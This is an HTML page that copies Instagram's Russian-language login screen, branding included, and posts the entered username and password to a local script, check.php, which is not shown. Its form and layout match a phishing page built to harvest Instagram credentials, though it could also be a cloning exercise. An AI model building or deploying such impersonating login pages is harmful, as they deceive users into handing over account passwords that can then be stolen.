<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Instagram</title>
	<style type="text/css">
		.yazik{
			margin-top: 15px;
			height: 50px;
			text-align: center;
			color: #737373;
			font-size: 13px;
		}
		.qarakusi{
			width: 360px;
			height: 510px;
			margin-left: auto;
    		margin-right: auto;
			border: solid #DBDBDB 1px;
			border-radius: 2px;
		}
		.strel{
			width: 10px;
			transform: rotate(90deg);
		}
		.instagram{
			width: 190px;
			margin-left: auto;
    		margin-right: auto;
    		margin-top: 20px;
		}
		.facebook{
			text-align: center;
			width: 270px;
			height: 60px;
			background-color: #0095f6 ;
			margin-left: auto;
    		margin-right: auto;
    		margin-top: 40px;
    		border-radius: 7px;
		}

	
		.fb{
			margin-top: 10px;
			width: 17px;
		}
		span{
			font-size: 16px;
			color: white;
			font-weight: 1000;
		}
		.hr1{
			margin-top: 40px;
			width: 110px;
		}
		.hr2{
			margin-top: 40px;
			width: 110px;
		}
		.hrn{
			display: flex;
  			justify-content:space-between;
		}
		nav{
			margin-top: 39px;
			font-size: 15px;
			color: #737373;
		}
		.log{
			margin-top: 20px;
			width: 270px;
			height: 32px;
			border-radius: 5px;
			border: solid #DBDBDB 1px;
			background-color: #FAFAFA;
			font-size: 12px;
			padding-left: 6px;
		}
		.pas{
			margin-top: 6px;
			width: 270px;
			height: 32px;
			border-radius: 5px;
			border: solid #DBDBDB 1px;
			background-color: #FAFAFA;
			font-size: 12px;
			padding-left: 6px;
		}
		.zabil{
			color:#0095f6;
			font-size: 14px;
			margin-left: 60%;
			margin-top: 15px;
		}
		.but{
			text-align: center;
			width: 270px;
			height: 33px;
			background-color: #0095f6 ;
			margin-left: auto;
    		margin-right: auto;
    		margin-top: 27px;
    		border-radius: 7px;
    		border: none;
    		color: white;
    		font-weight: 700;

		}
		.but:hover{
			background-color: #1877F2 ;

		}
		.zeg{
			display: flex;
			font-size: 14px;
			margin-top: 20px;
		}
		.y{
			margin-left: 5px;
			
		}
		a{
			color: #0095f6;
			text-decoration: none;
		}
		.meta{
			width: 80px;
			margin-left: 45%;
    		margin-top: 50px;

		}
	</style>
</head>
<body>
	<div class="yazik">Русский <img class="strel" src="imgn/strel.png">
	</div>
	<div class="qarakusi">
		<div class="instagram"><img class="instagram" src="imgn/instagram.png">
		</div>
		<div class="facebook">
			<img class="fb" src="imgn/facebuk.png">
			<span>
			Продолжить с аккаунтом Facebook
			</span>
		<div class="hrn">
		<div class="hr1">
		<hr>
		</div>
		<nav>ИЛИ</nav>
		<div class="hr2">
		<hr>
		</div>
	</div>
	<form action="check.php" method="post">
	<div class="inp">
		<input type="text" class="log" name="login" id="login" placeholder="Телефон, имя пользователя или эл. адрес"> 
		<input type="password" class="pas" name="pass" id="pass" placeholder="Пароль">
	</div>
	<div class="zabil"><a href="">Забыли пароль?</a></div>
	<button class="but" type="sumbit">Войти</button>
	</form>
	<div class="zeg">
	<div class="x">У вас ещё нет аккаунта?</div>
	<div class="y"><a href="">Зарегистрироваться</a></div>
	</div>
	</div>




	</div>
	<footer>
		<img class="meta" src="https://i.pinimg.com/originals/7c/43/83/7c43837296f2b6ffc183286b20d3afa2.png">
	</footer>




<script type="text/javascript">
	
</script>
</body>
</html>